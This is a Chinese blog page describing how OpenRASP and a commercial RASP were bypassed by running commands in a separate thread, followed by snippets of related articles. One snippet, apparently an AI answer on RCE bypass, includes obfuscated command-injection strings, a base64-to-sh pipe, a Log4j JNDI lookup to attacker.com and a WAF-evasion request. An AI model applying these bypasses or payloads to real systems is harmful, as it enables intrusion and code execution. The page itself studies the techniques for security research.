绕过rasp

最新推荐文章于 2025-04-26 14:11:18 发布
最新推荐文章于 2025-04-26 14:11:18 发布
阅读量1.4k 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Finlinlts/article/details/119989832
本文介绍了RASP(Runtime Application Self-Protection)的工作原理,并详细展示了如何绕过OpenRASP及某公司的RASP防护软件。通过修改配置和利用线程执行命令的方式,成功规避了RASP的检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

概述

RASP(Runtime application self-protection)运行时应用自我保护,

RSAP将自身注入到应用程序中,与应用程序融为一体,实时监测、阻断攻击,使程序自身拥有自保护的能力。并且应用程序无需在编码时进行任何的修改,只需进行简单的配置即可

绕过复现

openrasp

1 下载好利用demo,再下载好openrasp软件 ,按照说明文档进行配置,这里按照springboot框架进行配置,配置单机版本,修改相应配置

开启拦截

打开官方插件,首先定位到如下内容,将 all_log 改为 false。修改后,大部分检测算法都会变成拦截模式:

 启用配置参数

java -javaagent:/opt/spring-boot/rasp/rasp.jar -jar rasp-test-0.0.1-SNAPSHOT.jar

访问hello1,传入参数 baidu.com

 后台执行成功

某公司rasp防护软件

安装配置好相关软件

 启用配置参数

java -javaagent:c:\jspAgent\JSPAgent.jar -jar rasp-test-0.0.1-SNAPSHOT.jar

访问hello1,传入参数 youku.com

 后台执行成功

该方法通过开启一个线程来执行命令,从而绕过了rasp,因为rasp会判断请求url是否为空来判断是否校验。用线程的方式启动请求context中没有url。所以能绕过。

参考

RASP技术分析 – 绿盟科技技术博客

多种姿势openrasp命令执行绕过 - 安全客,安全资讯平台

Finlinlts
关注
JNI技术绕过rasp防护实现jsp webshell
weixin_47208161的博客
07-23 441
背景原理使用技术要点实战使用其他背景笔者近日看到了这样一篇文章:那些年我们堵住的洞 – OpenRASP纪实想到rasp这类工具是基于java、php运行期的堆栈...
OpenRASP xss算法的几种绕过方法
HBohan的博客
07-21 543
openrasp默认只能检测反射型XSS,存储型XSS仅IAST商业版支持。对于反射型xss,openrasp也只能检测可控输出点在html标签外的情况,本文的绕过方法是针对这种情况。如果可控输出点在html标签内,如或 内部,openrasp几乎检测不到。 测试环境 【网安学习资料】 windows / tomcat / jdk1.8 / openrasp 1.3.7-beta 测试环境部署参见https://www.anquanke.com/post/id/241107,或者官网文档。 在offici.
rasp java tomcat_Java安全之JNI绕过RASP
weixin_34740753的博客
02-27 453
Java安全之JNI绕过RASP0x00 前言前面一直想看该JNI的相关内容,但是发现JNI的资料还是偏少。后面发现JNI在安全中应用非常的微妙,有意思。0x01 JNI概述JNI的全称叫做(Java Native Interface),其作用就是让我们的Java程序去调用C的程序。实际上调用的并不是exe程序,而是编译好的dll动态链接库里面封装的方法。因为Java是基于C语言去实现的,Java...
RASP技术在DevOps中的安全应用
最新发布
软件供应链安全选型指南
04-26 762
最后,RASP可以在完全阻塞模式下部署,以查看安全测试是否被检测和阻塞,以及它们对用户体验的影响。RASP是一种在服务器上运行并在应用程序开始运行时生效的技术,可用于实时检测黑客对应用程序的攻击,是DevOps开发模式下的极佳选择。随着敏捷开发模式的盛行,缩短了应用程序开发、上线运营时间,而RASP可以检测到任何bug或漏洞,并实时解决问题,确保应用程序的所有版本都是安全的。当采用了RASP之后,开发人员可以将更多精力专注于开发上,避免了过多的时间浪费在漏洞的查找和修复中,可以大大加快应用程序上线的速度。
java防护webshell_JNI技术绕过rasp防护实现jsp webshell
weixin_32503531的博客
02-27 318
背景​ 想到rasp这类工具是基于java、php运行期的堆栈信息进行分析,可以尝试使用jni技术进行绕过。java技术栈中的jni的原理是使用java调用c、c++函数,具体实现的思路是jsp编译为class文件,该class通过jni技术调用另外一处dll里的函数绕过黑名单执行命令获取回显,即可实现rasp安全防护软件的绕过。github地址:https://github.com/na...
java的命令执行与bypassRASP
灰太的表格的博客
09-01 1304
关于php的webshell相信大家已经很了解了,webshell就是相当于可以控制目标服务器的一小段代码。今天讲下java的webshell以及bypassRASP。 java的命令执行一般都是通过Runtime类的Runtime.getRuntime().exec()方法来执行,来看一段demo (建议练习审计时不要用docker的环境,建议idea启动): 看一下执行效果: OK,这一段代码就是一个简单的webshell。接下来我们简单的看下调用链: ...
针对宝塔的RASP及其disable_functions的绕过1
08-03
针对宝塔的RASP及其disable_functions的绕过 RASP(Runtime Application Self-Protection)是一种 Runtime 应用程序自我保护技术,旨在保护应用程序免受攻击和恶意活动的影响。在宝塔平台上,RASP 技术可以拦截基于...
"宝塔RASP及disable_functions绕过挑战与测试
在宝塔的RASP(Runtime Application Self-Protection)及其disable_functions的绕过方面,存在着一系列的研究和挑战。通过开启宝塔自带的防跨站攻击,安装并开启宝塔PHP安全防护和防提权,以及实验环境的搭建,对...
基于RASP的Web安全检测方法
01-19
目前,传统的Web安全检测方法作用于程序输入输出端,不能防范经变形混淆后绕过检测进入程序内部执行的恶意代码,难以满足当前Web应用安全防护新需求。本方法基于对传统数据流监控方法风险的深入分析,结合RASP技术...
webshell下的Rasp简易绕过
UUniversity的博客
12-17 1308
在2014年的时候,Gartner引入了一词,简称为RASP。它是一种新型应用安全保护技术,它将保护程序像疫苗一样注入到应用程序中,应用程序融为一体,能实时检测和阻断安全攻击,使应用程序具备自我保护能力,当应用程序遭受到实际攻击伤害,就可以自动对其进行防御,而不需要进行人工干预。RASP技术可以快速的将安全防御功能整合到正在运行的应用程序中,它拦截从应用程序到系统的所有调用,确保它们是安全的,并直接在应用程序内验证数据请求。Web和非Web应用程序都可以通过RASP
关于OpenRASP绕过实现
2401_83799022的博客
11-20 1122
举个例子,当我的Application要加载一个类时,虽然是我的Application类加载器收到了类加载请求,但实际上,Application类加载器并不会直接去加载这个类,而是将这个类的加载委托给它的父类加载器,Extension类加载器,Extension类加载器也不会直接加载这个类,而是再继续向父类委托,也就是Bootstrap类加载器,Bootstrap类加载器在classpath中寻找这个类,并加载。如果成功找到了这个类,那么就直接返回。
网络安全-常见面试题(Web、渗透测试、密码学、Linux等)_密码输入什么拼接字符,可以绕过认证
2401_89308216的博客
12-10 629
减少 XSS 的发生。最早在firefox 23中实现,当时使用的是 X-Content-Security-Policy,它使用了前置词的内容安全性策略,并以W3C CSP1.0规范作为标准。
不止防JSON技术绕过RASP相比WAF的七大技术优势
weixin_55163056的博客
12-16 615
“贴身保镖”RASP
burp response绕过后台_OpenRASP SQL注入绕过
weixin_39903477的博客
12-01 716
OpenRASP介绍OpenRASP即应用运行时自我保护,“可直接注入到被保护应用的服务中提供函数级别的实时防护,可以在不更新策略以及不升级被保护应用代码的情况下检测/防护未知漏洞”——https://rasp.baidu.com/ 《OpenRASP 官方文档》OpenRASP防护效果环境搭建本文以Tomcat服务器为例,参考官网 快速接入——Tomcat服务器文档(https://...
RASP实践分析
ChenTing_的博客
03-21 2120
一、RSAP简介 1. Waf 简介: 它采用请求特征检测攻击方式,waf和防火墙就好比如一座大厦门口的保安,你要进入大厦,waf和防火墙就会在你进入大厦时进行安检,检查到你携带刀枪炸药、鸦片大麻,就会把你拦截下来,如果没有那就放你进入,至于你进入大厦后所做的一些行为就不会再去检测。 最近几年,攻击手段开始变得复杂,攻击面也越来越广。传统的安全防护手段,WAF、IDS(入侵检测系统),大多是基于规则,已经不能满足企业对安全的基本需求。对所有的请求都匹配规则,拖慢服务器性能。 产品形态: 硬件、软件、云。
JAVA 框架open_Spring Boot 框架
weixin_30696571的博客
03-03 439
Spring Boot 安装我们支持 war 包、jar 包两种部署模式。如果是 war 包的形式,直接参考相应服务器文档即可;如果是内嵌服务器的 jar 包形式,请参考本文档安装。对于 WebGoat 项目,对应的 jar 包通常为 webgoat-XXX.jar。半自动安装从 v1.2.0 版本开始,我们加入了 SpringBoot 半自动安装支持。之前的版本请参考手动安装章节。1. 安装软件...
Java springboot启动流程
非学无以广才,非志无以成学
03-10 2295
简要springboot启动流程
rce绕过关键字
04-03
<think>嗯,用户想了解RCE漏洞绕过的方法和关键技术点。首先,我需要回忆一下RCE的基本概念。RCE是远程代码执行,攻击者能够在目标系统上执行任意代码,危害极大。用户提到的绕过可能是指绕过现有的防御措施,比如WAF、输入过滤或者沙箱环境。 首先,我得考虑常见的绕过技术。比如,命令注入中的特殊字符绕过,像分号、管道符、反引号这些。有时候,黑名单过滤不完善,可以用编码或替换字符的方式绕过。比如,用十六进制编码或者Base64编码命令,然后解码执行。 然后,用户提供的引用里有提到CVE-2024-0012,是关于身份认证绕过导致RCE的案例。这可能涉及权限提升或认证机制中的漏洞,比如利用会话管理的问题或者Cookie篡改。另外,引用3提到Log4j漏洞,涉及JNDI注入,这类漏洞利用特定的协议或服务来触发,绕过检测可能需要混淆payload,比如使用非常规的协议格式或拆分攻击字符串。 还需要考虑上下文,比如输入验证的漏洞。如果应用对用户输入处理不当,未正确转义或过滤,攻击者可能通过构造特殊输入注入恶意代码。例如,在SQL注入中,使用注释符或大小写混合绕过,类似的方法可能适用于RCE绕过。 另外,环境变量注入也是一种可能。比如,通过控制环境变量参数来执行命令,某些程序可能会信任特定的环境变量,从而导致代码执行。还有,利用动态代码执行函数,如PHP的eval,Python的exec,如果用户输入直接传递给这些函数,没有严格过滤,就会导致RCE。 还有,框架或库的漏洞,比如旧版本的库存在已知漏洞,攻击者可以利用这些未修补的漏洞执行代码。例如,Apache Struts的漏洞曾被广泛利用。 现在要结合用户提供的引用,引用1提到代码审计和静态分析,所以在绕过时可能需要找到代码审计中的疏漏,比如未覆盖的边缘情况。引用2中的认证绕过导致RCE,说明权限提升或绕过认证步骤是关键。引用3中的Log4j漏洞检测被WAF拦截,所以绕过WAF可能需要混淆技术。 总结下来,RCE绕过的方法可能包括:命令注入绕过过滤、利用编码或混淆、认证/授权绕过、框架漏洞利用、上下文敏感攻击(如模板注入)、以及利用信任机制漏洞。 需要确保回答结构清晰,分点说明,每个技术点给出例子,并引用提供的资料。比如,在认证绕过部分引用CVE-2024-0012的例子,在Log4j部分提到引用3的检测方法。 还要注意用户要求使用中文,LaTeX格式的数学表达式,但这个问题可能不太涉及数学公式,所以可能不需要太多数学内容。但如果有涉及变量或代码部分,需要用行内格式,比如$command$。 最后生成相关问题,要围绕RCE绕过的扩展,比如防御措施、特定漏洞分析、检测技术等。</think>### RCE漏洞绕过方法及关键技术点分析 #### 一、常见RCE漏洞绕过方法 1. **命令注入绕过** - **特殊字符替换**:利用黑名单未覆盖的符号(如`$()`、`%0a`、反引号)拼接命令,例如: ```bash # 原始命令:cat /etc/passwd # 绕过形式:c'a't /et$@c/pass''wd ``` - **编码转换**:使用Base64、十六进制或URL编码混淆命令,例如: ```bash echo "bHM=" | base64 -d | sh # 解码后执行"ls" ``` 2. **输入过滤绕过** - **多级嵌套解析**:利用应用层协议(如HTTP参数污染、JSON/XML解析差异)注入恶意代码[^3]。 - **上下文敏感攻击**:在模板注入(SSTI)中,通过构造`${"".getClass().forName("...")}`绕过沙箱限制。 3. **认证/授权绕过** - **会话伪造**:通过Cookie篡改或JWT令牌伪造绕过身份验证(如CVE-2024-0012中的Web界面认证绕过)[^2]。 - **路径遍历**:利用未校验的路径参数访问敏感接口,例如`/admin/../api/exec?cmd=id`。 4. **框架/库漏洞利用** - **动态加载漏洞**:如Log4j的JNDI注入(`${jndi:ldap://attacker.com/exp}`),通过DNS查询混淆绕过WAF检测。 - **反序列化漏洞**:利用Java/Python的反序列化机制触发恶意代码,例如Apache Commons Collections的Gadget链。 #### 二、关键技术点 1. **漏洞链组合** 通过多个漏洞串联实现绕过,例如: - 先绕过认证(CVE-2024-0012)→ 再利用权限提升漏洞(CVE-2024-9474)→ 最终执行任意命令[^2]。 $$ \text{RCE} = \text{认证绕过} \oplus \text{权限提升} \oplus \text{命令执行} $$ 2. **环境依赖利用** 利用目标系统环境变量或依赖库的缺陷,例如: ```bash # 注入环境变量实现命令执行 curl http://target.com/api?input=;export PATH=/tmp:$PATH;malicious-bin ``` 3. **混淆与逃逸技术** - **WAF绕过**:通过分块传输、注释插入或Unicode编码绕过正则匹配,例如: ```http POST /api HTTP/1.1 Transfer-Encoding: chunked 3; x=x\r\ncmd\r\n0\r\n\r\n ``` - **代码混淆**:在PHP中使用`${_GET['a']}`动态调用函数,避免直接出现敏感关键词。 #### 三、防御建议 1. **输入严格校验**:使用白名单机制限制字符集,例如仅允许`[a-zA-Z0-9_]`。 2. **沙箱隔离**:对动态代码执行操作进行资源隔离(如Docker容器)。 3. **依赖库更新**:定期升级框架/库版本(如Log4j升级到2.17.0+)。 4. **纵深防御**:结合WAF、RASP(运行时应用自保护)和代码审计[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值